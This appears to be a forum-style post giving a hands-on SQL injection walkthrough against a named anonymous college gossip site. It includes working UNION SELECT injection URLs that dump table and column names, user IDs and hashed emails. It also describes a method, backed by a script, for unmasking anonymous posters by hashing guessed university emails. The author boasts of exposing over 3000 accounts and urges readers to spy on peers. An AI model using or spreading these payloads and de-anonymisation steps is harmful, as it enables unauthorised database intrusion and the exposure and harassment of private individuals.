Documenti di Didattica
Documenti di Professioni
Documenti di Cultura
The following link shows all of the vulnerable fields on a given webpage (using a
random thread, you could use any one you wanted though)
http://www.collegeacb.com/sb.php?school=jhu&page=thread&id=91305+AND+1=0+UNION+SEL
ECT+ALL+1,2,3,4,5,6,7,8,9,10,11,12,13,14--
As we can see, 1,3,4,5,6,7,8,9 are all vulnerable fields where we can put data we
want pulled from the SQL-database (the thing that holds user-id's and emails).
I'm going to skip a few parts here and get to the nitty-gritty of the matter. The
overall database is called "acb" and it has the following tables:
tbl_attempts,tbl_crush,tbl_emails,tbl_free_posts,tbl_message_headers,tbl_messages,
tbl_moderators,tbl_newpasses,tbl_original_posts,tbl_recentmail,tbl_replies,tbl_rep
orts,tbl_schools,tbl_topics,tbl_users,tbl_views,tbl_votes
The thing is, when we specify what table we want to check out, instead of writing
"tbl_users", we have to write it in Hex. So we get the following url (change the
hex code for tbl_users to the hex code for any other table you want):
http://www.collegeacb.com/sb.php?school=jhu&page=thread&id=91305+AND+1=0+UNION+SEL
ECT+ALL+1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14+from+information_
schema.columns+where+table_name=0x74626C5F7573657273--
What does this mean? It means that every email has a specific ID number attached
to it (as well as the number of bans said person has received). Let's pull out ID
and email, using the following (should be obvious how it was done, if you're
playing along at home):
http://www.collegeacb.com/sb.php?school=jhu&page=thread&id=91305+AND+1=0+UNION+SEL
ECT+ALL+1,2,3,group_concat(id,0x3a,email),5,6,7,8,9,10,11,12,13,14+from+tbl_users-
-
But look, the email is encrypted. Any good cryptologist can see that this is just
the SQL PASSWORD() command. While it's very hard to break PASSWORD(), the
designers of the site did something wonderful for us.. "tbl_emails" lists two
fields, "email" and "school". If we run the following, we see users emails and the
school they are associated with..
http://www.collegeacb.com/sb.php?school=jhu&page=thread&id=91305+AND+1=0+UNION+SEL
ECT+ALL+1,2,3,group_concat(email,0x3a,school),5,6,7,8,9,10,11,12,13,14+from+tbl_em
ails--
Now we can limit the search to only include school "jhu", and once we have all
these emails, we can simply run them through MYSQL's PASSWORD() command and match
the encrypted return up with one we pulled from the database, then modify our
search parameters to exclude those emails and continue on ad naseum.
That's not really what most of us want. We want to see who could probably be
posting about us, or somebody we know. So instead, it's much easier to encrypt-
then-match people's JHED emails that you know. Let's say I think Frat Brother #4
posted something bad about my buddy, luckily I know his name and can guess his
JHED (and, trust me, ~90% of people here signed up with their JHEDs). So I run
PASSWORD(adouche1@jhu.edu), get an encrypted string, and match it up to the data I
pulled so I can see what user-id is attached to it. If there's no hit, I try
PASSWORD(adouche2@jhu.edu), increasing the number up to some reasonable value
before giving up.
Once we have an email account's ID number, its all a matter of sorting through
tbl_replies or tbl_topics and sorting by user ID to see what this one person has
posted. There are many more refined methods of doing this, but this is probably
the one people will want to know how to do. It's also possible to just select one
field (I like field 5) in a given thread and have it display that person's id
number, or anything else if you're so possibly inclined. Play around, get a feel
for the database architecture, and you can do some cool stuff.
Oh, and a note to people using emails different than their JHED-given ones.. the
school's database should allow you to teash out what emails are registered to what
JHED-ID (looking at you, pedobear@jhu.edu). Trying to find a way to link them, it
shouldn't be that hard.
Who would go through all of this trouble? Well, it's not that much of a hassle if
you can write up some scripts to do it for you. Which I did.. a little perl script
that goes through the school's directory (pulled an offline copy), gets each
person's name and makes a presumed JHED email for them based on their first
initial, up to 6 letters of their last name, and gives them a number based on
frequency. It also generates a first-initial-last-name@jhu.edu address to test
too. Then it batch-encrypted them, and matched to ID numbers, and now I've got
over 3000 accounts open for business.
I won't be sharing these. Suffice to say, somebody knows everything you've posted
now. You guys should be nicer to eachother.
Total time for the home hacker: 3 hours, give or take. It's a good way to learn
how to NOT set up a secure database, too.
Total time for YOLO: an hour, if you can stick with it. Then you'll know
everything your best friend has been saying about you :) [seriously, watching this
is like watching a soap opera, its awesome]